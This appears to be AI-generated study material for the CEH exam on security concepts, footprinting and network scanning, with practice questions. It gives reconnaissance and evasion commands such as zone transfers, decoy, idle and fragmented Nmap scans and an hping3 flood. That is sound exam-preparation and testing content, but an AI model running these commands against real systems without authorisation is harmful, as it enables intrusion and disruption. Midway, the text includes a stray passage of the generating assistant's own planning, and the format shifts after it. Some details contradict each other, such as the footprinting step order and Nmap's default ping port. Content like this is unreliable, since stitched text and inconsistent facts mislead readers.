Domain 1: Information Security and Ethical Hacking Overview
Sub-Domain: Introduction to Ethical Hacking

Topic: Information Security Overview

    Core Concept: Information security protects data confidentiality, integrity, and availability (CIA triad). Attackers target weaknesses in these pillars to steal, alter, or deny access to information assets, making defense essential.

    Key Tools: N/A (conceptual). For risk assessment: NIST RMF framework (not a tool with a single command).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Students confuse authentication (verifying identity) with authorization (granting access). EC-Council tests non-repudiation as the assurance that a party cannot deny an action, not just logging.

    Countermeasure: Implement defense-in-depth: administrative, technical, and physical controls layered to cover all CIA aspects.

    MCQ: A company’s database is encrypted and backed up daily. An attacker deletes the live data, but it is restored within minutes. Which security property was temporarily lost?
    A) Confidentiality
    B) Integrity
    C) Availability
    D) Non-repudiation
    Correct: C – Availability was lost because data was inaccessible until restored. (A: no data was disclosed; B: data wasn't altered; D: no digital signing involved.)

Topic: Hacking Methodologies and Frameworks

    Core Concept: Hacking frameworks provide a structured approach to penetration testing. Attackers follow phases like reconnaissance, scanning, gaining access, maintaining access, and clearing tracks. CEH emphasizes the CEH Hacking Methodology (5 phases) as the exam baseline.

    Key Tools: N/A (methodology). For framework: Penetration Testing Execution Standard (PTES) – no command.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: EC-Council’s 5 phases are exactly: Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks. Do not mix in “Reporting” or “Remediation” as a phase in the hacking methodology; those are part of ethical hacking lifecycle but not the attacker’s methodology.

    Countermeasure: Understand the adversary’s playbook to design controls aligned to each phase (e.g., minimize footprinting exposure, detect scanning, prevent privilege escalation).

    MCQ: An ethical hacker completes network scanning and obtains a shell on the target. According to CEH’s hacking methodology, which phase comes next?
    A) Clearing Tracks
    B) Maintaining Access
    C) Reconnaissance
    D) Reporting
    Correct: B – After gaining access, the next step is maintaining access (backdoors). (A is the final phase; C is the first; D is not a phase in the attacker methodology.)

Topic: Hacking Concepts

    Core Concept: Hacking refers to exploiting vulnerabilities in systems to gain unauthorized access. Hackers are classified as Black Hat (malicious), White Hat (ethical, authorized), and Gray Hat (borderline, may act without permission but without malicious intent). EC-Council also includes hacktivists and state-sponsored groups.

    Key Tools: N/A (conceptual). Vulnerability scanners like Nessus are used by ethical hackers.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The exam distinguishes between a vulnerability (a weakness) and an exploit (the code/technique that uses the weakness). A threat is the potential danger; a risk is the impact/likelihood. Also, script kiddies use pre-written tools but may not understand them.

    Countermeasure: Ethical hacking uses the same tools as malicious hacking but within a legal framework with explicit written permission.

    MCQ: An attacker discovers a SQL injection flaw in a web app and writes a script to extract user data. The SQL injection flaw is an example of a:
    A) Threat
    B) Vulnerability
    C) Exploit
    D) Risk
    Correct: B – The flaw is the vulnerability. (A threat is the actor; C is the script; D combines probability and impact.)

Topic: Ethical Hacking Concepts

    Core Concept: Ethical hacking is conducted with proper authorization to test systems' security posture. It follows strict rules of engagement, a defined scope, and ends with a report. An ethical hacker must keep data confidential and respect legal boundaries.

    Key Tools: N/A (concept). Common testing frameworks: OSSTMM, PTES.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The most important element is written permission (the "get out of jail free card"). The exam emphasizes that testing without explicit authorization is illegal, even if the intent is good. Also, the non-disclosure agreement (NDA) is mandatory before testing.

    Countermeasure: Organizations should have a vulnerability management program that includes periodic ethical hacking engagements.

    MCQ: A pen tester is hired to assess network security. The tester launches an attack that crashes the production server, causing outage. Legally, the tester is protected because:
    A) The tester acted ethically
    B) The tester had a written agreement and authorization
    C) The attack was in the scope
    D) The tester followed OSSTMM
    Correct: B – Written authorization (contract) provides legal protection. Scope alone doesn't cover negligence; ethical intent doesn't absolve liability; OSSTMM is a framework, not legal authority.

Topic: Information Security Controls

    Core Concept: Controls are safeguards to mitigate risks. They are categorized as physical (locks, guards), technical (firewalls, encryption), and administrative (policies, training). They can be preventive, detective, deterrent, corrective, or compensating.

    Key Tools: N/A (concept). Access control models: DAC, MAC, RBAC.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: EC-Council may ask about the primary purpose of a control type. Preventive controls stop incidents before they occur (e.g., firewall deny rule). Detective controls identify incidents (e.g., IDS alerts). Deterrent controls discourage (e.g., warning banners). Corrective controls restore after an incident (e.g., backups). Compensating controls are alternatives when primary control is not feasible.

    Countermeasure: Implement defense-in-depth with multiple overlapping controls; regularly test controls via vulnerability assessments.

    MCQ: A company installs a security camera at the server room entrance. This camera is primarily which type of control?
    A) Preventive
    B) Detective
    C) Deterrent
    D) Corrective
    Correct: B – A camera records activity to detect unauthorized access. It may also have a deterrent effect, but its primary function is detection (recording evidence). If the camera actively alerts in real-time, still detective.

Topic: Information Security Laws and Standards

    Core Concept: Laws and standards govern data protection and cybercrime. Key regulations: GDPR (EU privacy), HIPAA (US healthcare), PCI DSS (payment card security), SOX (financial integrity). ISO/IEC 27001 provides an ISMS framework. Attackers exploit non-compliance gaps.

    Key Tools: N/A. Compliance check: OpenSCAP can audit against standards (command: oscap xccdf eval --profile <profile> <benchmark>, no specific output needed).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Know which regulation applies to which industry. PCI DSS is specifically for credit card data protection; it mandates encryption of cardholder data in transit and at rest. HIPAA protects health information. The exam may ask about the maximum penalty for a regulation or key articles.

    Countermeasure: Implement data classification, access controls, and encryption to meet legal/regulatory requirements; conduct regular compliance audits.

    MCQ: A healthcare provider’s database containing patient medical records is breached. Which regulation was primarily violated?
    A) GDPR
    B) PCI DSS
    C) HIPAA
    D) SOX
    Correct: C – HIPAA protects health information. (GDPR is European data privacy; PCI DSS is cardholder data; SOX is financial reporting integrity.)

Domain 2: Reconnaissance Techniques
Sub-Domain: Footprinting and Reconnaissance

Topic: Footprinting Concepts

    Core Concept: Footprinting is the process of gathering as much information as possible about a target system/organization to find ways to infiltrate it. It's passive, non-intrusive, and uses publicly available data. Attackers use it to map the attack surface.

    Key Tools: whois (domain info), nslookup (DNS queries), theHarvester (email gathering: theHarvester -d target.com -b google).

    Critical Port Numbers/Protocols: DNS (53), HTTP (80), HTTPS (443) for info sources.

    Exam Trap: Footprinting can be passive (no direct interaction with target network) or active (touching target, e.g., social engineering). EC-Council says footprinting is mostly passive, but DNS queries might touch the target's DNS server; still, they consider it passive reconnaissance.

    Countermeasure: Restrict public info: disable directory listings, use generic error pages, scrub metadata from documents, use DNS record obscurity (not a complete fix), and train employees on social media risks.

    MCQ: A penetration tester collects employee email addresses from Google, LinkedIn, and company website without sending any packets to the company's network. This activity is:
    A) Active footprinting
    B) Passive footprinting
    C) Scanning
    D) Enumeration
    Correct: B – No direct interaction with target network; passive. (A involves direct contact; C involves sending probes; D is more intrusive and extracts detailed resources.)

Topic: Footprinting Methodology

    Core Concept: The methodology is a structured process: (1) Footprinting through search engines, (2) Footprinting through web services, (3) Website footprinting, (4) Email footprinting, (5) Whois footprinting, (6) DNS footprinting, (7) Network footprinting, (8) Social engineering. This systematic approach ensures comprehensive target profiling.

    Key Tools: At each step, use appropriate tools: search engines with Google dorking, web services like Netcraft, Whois tools, DNS tools like dig.

    Critical Port Numbers/Protocols: DNS (53), HTTP/HTTPS (80/443).

    Exam Trap: The order may be tested; they might ask what step comes after searching for employee emails (often DNS footprinting). Remember the methodology is not perfectly linear but the exam expects the listed sequence.

    Countermeasure: Organizations should limit information leakage at each phase: hide WHOIS info (private registration), sanitize DNS records, avoid exposing internal IPs in DNS, train employees.

    MCQ: According to the CEH footprinting methodology, after performing Whois lookup, what is the immediate next step?
    A) Footprinting through social networking sites
    B) DNS footprinting
    C) Network footprinting
    D) Email footprinting
    Correct: B – The typical sequence is Whois → DNS footprinting. (The full order: search engines, web services, social networking, website, email, Whois, DNS, network, social engineering.)

Topic: Footprinting through Search Engines

    Core Concept: Attackers use search engines (Google, Bing) with advanced operators (Google dorking) to uncover sensitive information accidentally exposed on the web, such as login pages, configuration files, or internal documents.

    Key Tools: Google search using operators like site:target.com filetype:pdf, intitle:"index of", inurl:admin. Shodan (search engine for devices: shodan host <IP>).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Google hacking database (GHDB) is a collection of dork queries. EC-Council may ask which operator finds pages with a specific word in the URL (inurl:) vs. in the title (intitle:). Also, cache: shows cached version.

    Countermeasure: Use robots.txt to disallow sensitive directories (but it's not a security control), enforce authentication, remove sensitive data from public-facing content.

    MCQ: An attacker searches for "site:example.com intitle:'index of' 'backup.sql'". What is the attacker looking for?
    A) SQL injection vulnerabilities
    B) Directory listing of backup database files
    C) WordPress admin panel
    D) DNS zone transfer
    Correct: B – The query reveals directories with backup SQL files. (A would need injection points; C uses /wp-admin; D uses DNS tools.)

Topic: Footprinting through Web Services

    Core Concept: Using online services to gather information about target domain, IP ranges, and infrastructure. These include Netcraft (server details, uptime), Shodan (IoT/devices), Censys, domain dossier, and Archive.org (Wayback Machine) to view historical versions of websites.

    Key Tools: Netcraft site report (https://sitereport.netcraft.com/?url=target.com), Shodan search, Censys search, theHarvester (email/domain info), SpiderFoot (automation tool: spiderfoot -s target.com).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The Wayback Machine (Archive.org) can reveal old versions of a site that may contain sensitive data or forgotten admin panels. EC-Council asks about recovering deleted content via Archive.org.

    Countermeasure: Regularly review archived snapshots and request removal of sensitive content; avoid exposing internal info on public sites.

    MCQ: An organization removed its “/partners” login page after a security review. An attacker uses what service to potentially view the removed page?
    A) Shodan
    B) Netcraft
    C) The Wayback Machine
    D) Google Dorking
    Correct: C – Archive.org stores historical page snapshots. (Shodan shows live services; Netcraft shows current server tech; Google may index only live pages.)

Topic: Footprinting through Social Networking Sites

    Core Concept: Attackers scrape social media (LinkedIn, Facebook, Twitter) to gather employee names, roles, email addresses, organizational structure, and even technical details from posts (photos with badges, screen shots). This aids in social engineering and password guessing.

    Key Tools: theHarvester (theHarvester -d target.com -b linkedin), Creepy (geolocation data), Maltego (graphical mapping of relationships).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: LinkedIn is heavily emphasized. Attackers can identify job postings listing technologies used (e.g., “need Cisco admin”) to map the infrastructure. Also, employees posting “first day at X” reveals new hires ripe for social engineering.

    Countermeasure: Enforce social media policy, restrict sharing of work details, conduct awareness training, and use privacy settings.

    MCQ: A hacker searches LinkedIn for employees at TargetCorp and finds a network engineer listing his CCNA certification. How can the attacker exploit this?
    A) Spear-phishing with a Cisco-themed email
    B) DNS zone transfer
    C) Password cracking
    D) ARP poisoning
    Correct: A – Knowing the person's role and technology enables targeted phishing. (B not relevant; C has no credentials yet; D is network-level attack.)

Topic: Website Footprinting

    Core Concept: Analyzing the target's website to extract information like technologies used, hidden directories, comments in source code, robots.txt, and sitemap. This reveals web server type, CMS, frameworks, and potentially sensitive internal links.

    Key Tools: wget (mirror site: wget -r target.com), Web Data Extractor, HTTrack (clone website). Browser dev tools to view source. WhatWeb (whatweb target.com to identify tech).

    Critical Port Numbers/Protocols: HTTP (80), HTTPS (443).

    Exam Trap: Examining robots.txt might reveal hidden/admin directories, but it's not a security control; attackers check it first. Comments in HTML may contain database names, passwords left by developers.

    Countermeasure: Remove developer comments, restrict access to admin panels, use generic error pages, and don't rely on robots.txt for security.

    MCQ: A penetration tester finds the line "<!-- connection string: server=db01; uid=admin; pwd=password -->" in a web page source. What should the organization do?
    A) Delete the comment and change credentials
    B) Disable directory listing
    C) Implement CAPTCHA
    D) Use HTTPS
    Correct: A – The comment exposes database credentials; immediate removal and credential rotation needed. (B is about directory listing; C prevents automation; D encrypts traffic but doesn't fix comment.)

Topic: Email Footprinting

    Core Concept: Gathering email addresses of employees to launch phishing attacks or guess usernames. Attackers use tools to harvest addresses from web searches, WHOIS, and public mailing lists. They can also trace email headers to map internal servers and IPs.

    Key Tools: Email extractor tools, theHarvester -d domain.com -b all, email tracking services (like readnotify). Analyzing headers manually: examine "Received:" lines.

    Critical Port Numbers/Protocols: SMTP (25), POP3 (110), IMAP (143).

    Exam Trap: Email header analysis can reveal the originating IP, internal server names, and email client. An attacker can use this to identify internal network ranges. Also, bounce messages may leak internal info.

    Countermeasure: Implement email filtering, remove internal IPs from headers (use SMTP gateway rewriting), train users to avoid posting corporate emails publicly.

    MCQ: An attacker receives an email from target.com and examines the header: "Received: from mail.internal.target.com ([192.168.10.25])". What information can be inferred?
    A) The email is a phishing attempt
    B) Internal hostname and private IP address
    C) The email server is vulnerable to relay
    D) The email was encrypted
    Correct: B – The header reveals internal naming and IP scheme, aiding network footprinting. (A is not indicated; C needs further testing; D encryption not shown.)

Topic: Whois Footprinting

    Core Concept: Querying WHOIS databases to obtain domain registration information: owner, administrative/technical contacts, email, phone, DNS servers, and registration dates. Used to map key personnel and network infrastructure.

    Key Tools: whois target.com (Linux command), online whois services (whois.domaintools.com). Whois lookup provides raw registrant data.

    Critical Port Numbers/Protocols: TCP 43 (WHOIS protocol).

    Exam Trap: If private registration is used, the registrar’s info is displayed instead of the actual owner. But even then, the DNS servers listed can be used for further footprinting.

    Countermeasure: Enable domain privacy/WHOIS protection to hide registrant details. However, DNS server names are still visible.

    MCQ: An ethical hacker runs whois example.com and gets no registrant email but sees “ns1.example.com” and “ns2.example.com”. What can still be done?
    A) No further action possible
    B) Use the DNS servers for DNS footprinting
    C) Contact the registrar for the email
    D) Report to law enforcement
    Correct: B – DNS server names are public and can be queried for zone information or IP. (A is wrong; C social engineering? Not standard; D not needed.)

Topic: DNS Footprinting

    Core Concept: Querying DNS servers to obtain information about the target’s domain, including A, MX, NS, CNAME, SOA records. Attackers attempt zone transfers (if misconfigured) to list all records, revealing internal IPs and hostnames.

    Key Tools: nslookup (nslookup -type=any target.com), dig (dig axfr @ns-server target.com), DNSRecon (dnsrecon -d target.com -t axfr), dnsenum. nslookup is interactive.

    Critical Port Numbers/Protocols: DNS uses TCP/UDP 53; zone transfer uses TCP 53.

    Exam Trap: The exam tests that a successful zone transfer (AXFR) dumps all DNS records. If the server allows it, the attacker gets a complete map of subdomains and internal IPs. Also, dig with -t AXFR is a must-know.

    Countermeasure: Restrict zone transfers only to authorized secondary DNS servers, use split DNS (internal vs external views).

    MCQ: A penetration tester runs dig axfr @ns1.target.com target.com and receives a list of all hostnames and IP addresses. This indicates:
    A) The DNS server is poisoned
    B) Zone transfer is allowed
    C) The server is patched
    D) DNS cache snooping is enabled
    Correct: B – The command attempts a zone transfer, and success indicates misconfiguration. (A poisoning injects false records; C not patched; D cache snooping is different.)

Topic: Network Footprinting

    Core Concept: Mapping the target’s network range, subnets, and network topology using information from ARIN/RIPE, traceroute, and autonomous system (AS) lookups. This provides the attacker with IP blocks to scan.

    Key Tools: tracert (Windows), traceroute (Linux), ARIN whois (whois -h whois.arin.net <IP>), Robtex, NeoTrace (graphical). Traceroute output reveals routers in path.

    Critical Port Numbers/Protocols: ICMP (no port) for traceroute; UDP high ports for traceroute default; TCP 80/443 can be used with traceroute options.

    Exam Trap: Traceroute uses TTL expired messages; blocking ICMP can disrupt traditional traceroute. Attackers can use TCP traceroute on port 80/443 to bypass filters. Also, regional internet registries (RIRs) allocate IP blocks; footprinting includes IP block range discovery.

    Countermeasure: Filter ICMP time-exceeded at border, but that may break normal operation. Use firewall rules to limit exposure of internal router IPs.

    MCQ: A target network blocks ICMP packets. How can an attacker still perform a traceroute to discover network hops?
    A) Use UDP traceroute
    B) Use TCP traceroute on port 80
    C) Use DNS zone transfer
    D) Use ARP requests
    Correct: B – TCP traceroute (e.g., traceroute -T -p 80 target.com) uses TCP SYN packets, bypassing ICMP filters. (A still uses ICMP time exceeded; C unrelated; D only local segment.)

Topic: Footprinting through Social Engineering

    Core Concept: Using human interaction to collect information. Attackers may call employees pretending to be tech support, send phishing emails, or use physical methods (dumpster diving) to extract network details, credentials, or internal documentation.

    Key Tools: No specific tool; techniques include pretexting, tailgating, shoulder surfing. Social engineering toolkit (SET) automates phishing/campaigns (setoolkit launch).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Social engineering is considered an active footprinting technique because it involves direct interaction with the target organization. EC-Council distinguishes technical from human-based social engineering. Dumpster diving is a physical form of information gathering.

    Countermeasure: Security awareness training, strict verification procedures for information disclosure, clean desk policy, shredding sensitive documents.

    MCQ: An attacker calls an employee, claiming to be from the IT help desk, and asks for the employee's username and password to "fix an account issue." This is an example of:
    A) Tailgating
    B) Pretexting
    C) Shoulder surfing
    D) Dumpster diving
    Correct: B – Pretexting involves creating a false scenario to trick the target. (A is following someone into a building; C is watching keyboard; D is trash searching.)

Topic: Footprinting Tools

    Core Concept: A suite of automated tools helps aggregate footprinting information. These include passive reconnaissance tools and frameworks that combine multiple data sources. Attackers use them for efficiency.

    Key Tools: Maltego (graphical link analysis for relationships, no single command; launches GUI), Recon-ng (module-based: recon-ng, then use module), FOCA (metadata extraction: FOCA.exe), theHarvester, OSINT Framework (web-based), SpiderFoot (spiderfoot -s target.com).

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The exam might ask which tool is specifically used for gathering email addresses and subdomains from public sources: theHarvester. For metadata extraction from documents: FOCA. Maltego is for link analysis of people, domains, networks.

    Countermeasure: Disable access to metadata in public documents, use Data Loss Prevention (DLP) systems to monitor sensitive data leakage.

    MCQ: A security analyst wants to automatically gather email addresses, employee names, and subdomains from multiple search engines. Which tool is best suited?
    A) Nmap
    B) Wireshark
    C) theHarvester
    D) John the Ripper
    Correct: C – theHarvester is purpose-built for that. (A is network scanner; B is packet analyzer; D is password cracker.)

Topic: Footprinting Countermeasures

    Core Concept: Prevent information leakage by limiting publicly available data, training employees, and implementing technical controls. The goal is to reduce the attack surface discovered during reconnaissance.

    Key Tools: N/A. Practices include using domain privacy, disabling zone transfers, removing metadata from documents, configuring web servers to hide version info, and employing social media guidelines.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The correct countermeasure for a given footprinting technique is often straightforward: to prevent Google dorking, use robots.txt but better to avoid exposing sensitive content; to prevent Whois info, enable domain privacy; to prevent DNS zone transfers, restrict AXFR.

    Countermeasure: (This topic is the countermeasure, so the answer is itself.) Implement all technical and administrative controls across each footprinting vector. Regularly search for your own organization’s exposed data.

    MCQ: Which is the best defense against an attacker using theHarvester to collect corporate email addresses?
    A) Disable ICMP
    B) Implement a firewall
    C) Restrict email addresses published on public websites and social media
    D) Use strong passwords
    Correct: C – Removing public email addresses prevents harvesting. (A and B are network controls, not for harvesting; D addresses password attacks.)

(Continue to next sub-domain... I'll output up to here and then indicate continuation? The user wants the whole blueprint. I'm at Domain 2 Sub-Domain Footprinting complete. Next is Scanning Networks (Deep Dive). I'll continue. The response length is increasing, I'll try to output all in one response but may need to split if exceeding limits. I'll produce the full set, but I'll stop cleanly if needed. For now I'll proceed to Scanning Networks, then Enumeration, Domain 3, etc. I'll craft the content as per Deep Dive format, each topic will have a full breakdown. I'll need to be mindful of token limits but I'll attempt to do all. I'll include all Domains. Because the output will be massive, I'll try to condense where possible, but the instructions demand complete content. I'll just continue writing in the same response. No extra commentary. I'll proceed domain by domain. I'll start Domain 2 Sub-Domain Scanning Networks.## Domain 2: Reconnaissance Techniques (continued)
Sub-Domain: Scanning Networks

Topic: Network Scanning Concepts

    The 80/20 Summary: Network scanning discovers live hosts, open ports, and services. It bridges footprinting and enumeration. Key concepts: TCP three-way handshake (SYN, SYN/ACK, ACK), scan types (SYN stealth, full connect, Xmas, NULL, FIN), IDS evasion. Must-know: ICMP ping sweep, TCP ping, UDP scanning is slow and unreliable because UDP is connectionless.

    The Logical Breakdown: Scanning sends crafted packets and analyzes responses to map the network. Step 1: Host discovery (which IPs are alive) using ICMP echo requests or TCP SYN to common ports. Step 2: Port scanning to find open ports by sending probes; e.g., SYN scan sends SYN, if SYN/ACK received → port open, RST received → port closed; no response or ICMP unreachable → filtered. Step 3: Service and version detection (banner grabbing). Real-world scenario: An attacker performs a SYN scan on a target's public IP range using Nmap; identifies port 80 open, then uses version detection to learn it's Apache 2.4.6, cross-references for known vulnerabilities to exploit.

    The Technical Toolset: Nmap (primary): nmap -sS -p 1-1000 192.168.1.0/24 (SYN stealth scan). Success: lists open ports with state "open". Hping3: hping3 -S -p 80 10.0.0.1 sends custom SYN packet; output shows flags in reply. NetScanTools Pro (commercial). Angry IP Scanner (lightweight host discovery).

    Exam Focus Areas (High Yield):

        Port numbers: FTP 21, SSH 22, Telnet 23, SMTP 25, DNS 53, HTTP 80, HTTPS 443, SMB 445, RDP 3389.

        Scan types: TCP Full Connect (-sT) completes handshake (logged), Stealth SYN (-sS) half-open, not logged by some apps.

        UDP scan (-sU) is slow; open ports may not reply, closed ports get ICMP port unreachable.

        Countermeasure: Firewalls filter and limit ICMP, IDS/IPS detect rapid connections, use of port knocking.

    Knowledge Check: A security analyst runs nmap -sS -p 22,80,443 10.10.10.5 and sees: 22/tcp open, 80/tcp filtered, 443/tcp closed. What does "filtered" indicate?
    A) The port is open but firewall blocks access to the scanner
    B) The service is disabled
    C) Nmap cannot determine if the port is open because no response was received
    D) The host is down
    Correct: C – "Filtered" means a firewall dropped the probe, so Nmap couldn't confirm open/closed. (A would likely be "open" if firewall allows but service is behind; B would be "closed" with RST; D host would be no response at all, but other ports responded so host is up.)

Topic: Scanning Tools

    The 80/20 Summary: Nmap is the industry standard for port scanning and host discovery. Other tools: Hping3 for packet crafting, Netcat for banner grabbing, Masscan for ultra-fast scanning. Nmap's scripting engine (NSE) extends functionality for vulnerability detection.

    The Logical Breakdown: Tools automate packet injection and response analysis. Nmap sends probes (ICMP, TCP, UDP), interprets responses, and categorizes ports as open, closed, filtered, unfiltered. It can also detect OS and services. Hping3 allows custom packet construction to test firewall rules. Real-world: Using Nmap's -A option (aggressive) to detect OS and services on a discovered open port 80, attacker finds an outdated IIS server and targets it.

    The Technical Toolset: Nmap: nmap -sV -O 192.168.1.1 (version and OS detection), success shows service names and OS details. Netcat: nc -nv 10.0.0.1 80 then HEAD / HTTP/1.0 (banner grab). Hping3: hping3 -S -p 80 --flood target (DoS testing, not typical scanning). Masscan: masscan -p80,443 10.0.0.0/8 --rate=10000 (fast scan of large ranges).

    Exam Focus Areas (High Yield): Nmap options: -sS SYN scan, -sT TCP connect, -sU UDP scan, -sV version, -O OS detection, -Pn skip host discovery (treat all hosts as up), -p port range. Nmap NSE: --script option, e.g., --script=http-headers. EC-Council asks about Nmap output states: open, closed, filtered, open|filtered (UDP). Also, Hping3 can bypass some firewall rules by using fragment packets.

    Knowledge Check: To perform a UDP scan on the top 100 ports and avoid sending any ICMP ping, which Nmap command should be used?
    A) nmap -sU -F 192.168.1.1
    B) nmap -sU -Pn --top-ports 100 192.168.1.1
    C) nmap -sS -Pn 192.168.1.1
    D) nmap -sT -p 1-100 192.168.1.1
    Correct: B – -sU for UDP, -Pn to skip host discovery, --top-ports 100 for most common ports. (A uses -F for fast top 100, but does not disable host discovery; C is TCP SYN; D is TCP connect.)

Topic: Host Discovery

    The 80/20 Summary: Host discovery identifies live systems on a network. Techniques: ICMP ping sweep, TCP SYN/ACK ping, UDP ping, ARP scan (on local network). Nmap’s default uses ICMP echo and TCP SYN to port 443. Blocking ICMP is common, so TCP probes are more reliable.

    The Logical Breakdown: Attacker sends probes to a range of IPs; those that respond are considered alive. If a host doesn't respond, it might be down or filtered. On a local Ethernet, ARP requests (nmap -sn -PR) are unbeatable for host discovery because ARP is necessary for IP communication. Real-world: Pen tester on a /24 subnet runs nmap -sn 192.168.1.0/24 to list all live IPs before deeper scanning; output shows "Host is up" with MAC address.

    The Technical Toolset: Nmap: nmap -sn 192.168.1.0/24 (ping scan - host discovery only, no port scan). nmap -PE ICMP echo, -PP timestamp, -PM address mask request. arp-scan --localnet (tool specifically for ARP). fping: fping -g 192.168.1.0/24 (mass ping).

    Exam Focus Areas (High Yield): -sn disables port scan after discovery. -Pn skips host discovery entirely (assumes all hosts up). EC-Council often tests that ARP scan only works on the local subnet (same broadcast domain). Also, TCP SYN ping uses port 80 by default; can be changed with -PS.

    Knowledge Check: An internal penetration tester wants to discover all live hosts on the local Ethernet without sending any IP packets. Which Nmap option is best?
    A) nmap -sP 192.168.1.0/24
    B) nmap -sn -PS 192.168.1.0/24
    C) nmap -sn -PR 192.168.1.0/24
    D) nmap -Pn 192.168.1.0/24
    Correct: C – -PR performs ARP scan, which uses Layer 2 ARP requests, not IP packets. (A is ping scan, uses ICMP/TCP; B uses TCP SYN; D skips discovery, assumes up.)

Topic: Port and Service Discovery

    The 80/20 Summary: Port scanning reveals which TCP/UDP ports are open. Service discovery identifies the application and version behind the port, often by banner grabbing or sending specific probes. This enables vulnerability mapping.

    The Logical Breakdown: After host discovery, attacker enumerates open ports using scan techniques. For each open port, Nmap can probe with a variety of predefined service fingerprints (-sV). It sends particular requests (e.g., HTTP GET, SSL client hello) and matches the response against its database. Banner grabbing manually involves connecting to a port and reading the initial server response. Real-world: An attacker finds port 21 open, connects with nc 10.0.0.1 21, reads banner "220 ProFTPD 1.3.5 Server", then searches for exploits in that version.

    The Technical Toolset: Nmap: nmap -sV -p 21,22,80 10.0.0.1 (version detection). Nmap scripts: --script=banner. Netcat: nc -v target 22 (banner grab). Amap: amap -b 10.0.0.1 80 (application mapper). Service detection in Nmap uses probe files (nmap-service-probes). Success: Nmap output shows "service: ftp" and "version: ProFTPD 1.3.5".

    Exam Focus Areas (High Yield): Banner grabbing is active reconnaissance. Version detection can be intrusive. Nmap -sV --version-intensity 0-9 (intensity). Sometimes -A enables OS and service detection. The exam expects you to know that an open port does not guarantee the service is the standard one; Nmap’s service detection can identify non-standard services.

    Knowledge Check: An Nmap scan shows port 8080 as open with "http-proxy" service. To manually verify, what command would an attacker likely use?
    A) ping 8080
    B) nslookup 8080
    C) telnet 10.0.0.1 8080 then HEAD / HTTP/1.0
    D) tracert -p 8080
    Correct: C – Connecting with telnet or netcat and sending an HTTP request banner-grabs the response. (A and B are not for port banners; D is traceroute.)

Topic: OS Discovery (Banner Grabbing/OS Fingerprinting)

    The 80/20 Summary: OS fingerprinting determines the operating system of a target by analyzing network responses (TTL, TCP window size, IP ID sequence). Active fingerprinting sends crafted packets and compares to signature DB; passive fingerprinting observes traffic without sending packets. Banner grabbing from services often reveals OS.

    The Logical Breakdown: Active OS detection (Nmap -O) sends a series of TCP/UDP probes and analyzes subtle differences in protocol implementation (e.g., TCP initial sequence number, IP ID generation, timestamp options). Passive tools like p0f sniff traffic and infer OS from fields like TTL (Windows typically 128, Linux 64) and window size. Real-world: An attacker passively monitors traffic to a web server; sees TTL 64, window size 5840, concludes it's likely Linux, then tailors exploits accordingly.

    The Technical Toolset: Nmap: nmap -O 10.0.0.1 (OS detection; requires at least one open and one closed port). nmap -O --osscan-guess for aggressive guessing. p0f: p0f -i eth0 (passive, listens). Ettercap can also passive fingerprint. Netcat for banner grabbing: nc 10.0.0.1 22 might show "SSH-2.0-OpenSSH_7.9 Ubuntu-10" indicating Ubuntu.

    Exam Focus Areas (High Yield): TTL values: Linux/Unix 64, Windows 128, Cisco 255. Nmap -O requires at least one open TCP port and one closed TCP port to build fingerprint. If no open port, Nmap might not identify OS. Countermeasure: Modify TTL, use a firewall proxy to hide real OS. Also, passive fingerprinting cannot be detected.

    Knowledge Check: A security analyst runs nmap -O 192.168.1.100 and gets: "OS details: Linux 2.6.32 – 3.10". The scan also shows port 22/tcp open and 23/tcp closed. Why did it succeed?
    A) Because port 23 was open
    B) Because at least one open and one closed port were found
    C) Because the host responded to ICMP
    D) Because the target runs Linux
    Correct: B – Nmap’s OS detection needs both an open and a closed TCP port to differentiate implementations. (A says open port 23, but 23 is closed, still fine; C irrelevant; D circular.)

Topic: Scanning Beyond IDS and Firewall

    The 80/20 Summary: Attackers use evasion techniques to avoid detection by IDS/IPS and bypass firewall rules. Methods: packet fragmentation, decoy scanning, source port manipulation, idle scan, timing adjustments, and using proxies.

    The Logical Breakdown: Many IDS rely on signature matching or anomaly detection. Fragmentation splits TCP header across packets to evade simple signature matching. Decoy scans mix the attacker's real IP with fake IPs, making it hard to trace. Idle scan uses a zombie host with predictable IP ID to scan stealthily. Slowing down scans (-T0) avoids triggering rate-based alerts. Source port trick: using allowed port like 80 as source port may bypass poorly configured firewall rules (e.g., --source-port 53). Real-world: Attacker scans target with nmap -sS -D 10.10.10.1,10.10.10.2,ME target.com to obscure his real IP.

    The Technical Toolset: Nmap fragmentation: -f (fragment packets), --mtu (specify MTU). Decoy: -D decoy1,decoy2,ME (ME ensures real IP included). Idle scan: -sI zombie_ip. Timing: -T0 (paranoid) to -T5 (insane). Source port: --source-port 53. Hping3 can craft custom flags and fragments. Fragroute: routes traffic through a fragmenting proxy.

    Exam Focus Areas (High Yield): Idle scan is completely silent from attacker’s real IP; requires a zombie with sequential IP ID generation. Nmap decoy scan: the real attacker IP is still in the list, but target sees many IPs. Nmap’s --data-length appends random data to avoid signature. Countermeasure: IDS that does packet reassembly, stateful firewalls that detect decoy by mismatched TCP sequence numbers. EC-Council often asks which option fragments packets: -f.

    Knowledge Check: An attacker wants to scan a target without revealing his own IP. He identifies a zombie host 10.0.0.50 with predictable IP IDs. Which Nmap scan accomplishes this?
    A) nmap -sS 10.0.0.50
    B) nmap -sI 10.0.0.50 10.10.10.10
    C) nmap -D 10.0.0.50 10.10.10.10
    D) nmap -sA 10.10.10.10
    Correct: B – -sI idle scan uses the zombie to scan the target; the target sees the zombie's IP. (A scans zombie; C decoy still includes real IP; D ACK scan to map firewall rules.)

Topic: Network Scanning Countermeasures

    The 80/20 Summary: Defense against scanning includes properly configuring firewalls, using IDS/IPS to alert on scan patterns, disabling unnecessary services, employing port knocking, and filtering ICMP. The goal is to reduce information leakage and slow down attackers.

